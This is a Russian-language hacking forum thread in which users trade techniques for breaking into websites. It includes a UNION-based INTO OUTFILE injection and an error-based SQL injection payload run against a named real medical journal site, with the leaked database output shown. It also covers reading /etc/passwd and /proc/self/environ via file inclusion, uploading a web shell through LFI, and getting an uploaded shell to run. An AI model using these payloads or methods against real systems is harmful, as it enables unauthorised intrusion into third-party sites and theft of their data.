Как узнать путь на хостинге, имея sql-inj? Вот таблицы с данными админки нет, делаю http://xxx/news.php?id=-1' UNION SELECT 1,2,3,4,5,6 INTO OUTFILE '1.txt' -- пишет You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1.txt --' at line 1
короче просто некоторым пользователям выставили ограничение на заливку файло,там обновление. теперь надеюсь понятно?!?! МУДАКИ-->значит мудаки
Мудаки, потому, что базу засирают. foma9999, мм, похоже на error based, но очень странная. Я не смог раскрутить. Софт тоже не взял. Спроси у Ereee.
да вы уже со всем обленились(((( берите toolza,sqlmap и вперёд я думаю такие посты либо сразу delete либо выговор какой нить,модеры позаботьтесь об этом
Ребят, что делать если proc/self/environ пуст? Хотя тут всё ок proc/self/status proc/self/cmdline (/usr/sbin/apache2-kstart) etc/passwd
Fooog Во-первых, к переменным окружения не всегда есть доступ. Во-вторых, там не всегда есть данные, которыми можно манипулировать. В -третьих, твои слова: Звучат весьма, мммммм, эпично =\
Если на сервере (именно на всем сервере на любом сайте) есть phpinfo - можно спокойно залить шелл через LFI.
Например так: http://www.sirirajmedj.com/content.php?content_id=2554+and(select+1+from(select+count(*),concat((select+table_name+from+information_schema.tables+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)-- Смотри исходник(внизу): Code: <!--SQL: SELECT c.journal_id, c.section_id, c.subject, c.address, c.abstract, c.keyword, c.keyword, c.pdf_file, c.start_page, c.end_page FROM medj_content as c WHERE c.status = 1 AND c.content_id = 2554 and(select 1 from(select count(*),concat((select table_name from information_schema.tables limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- MySQL: Duplicate entry '[COLOR=Red]COLLATIONS[/COLOR]1' for key 1-->
а вот такой вопрос, залил шелл на сайт через админку, открываю его а мне пишет 500 Внутренняя ошибка сервера, я тут гдето видел что нужно залить файл htaccess а что в нём должно быть написано чтобы всё работало?
не, я та и php могу залить, мне не нужна картинка, тросто при открытии шелла пишет 500 Внутренняя ошибка сервера, может файл htaccess както помочь ето исправить?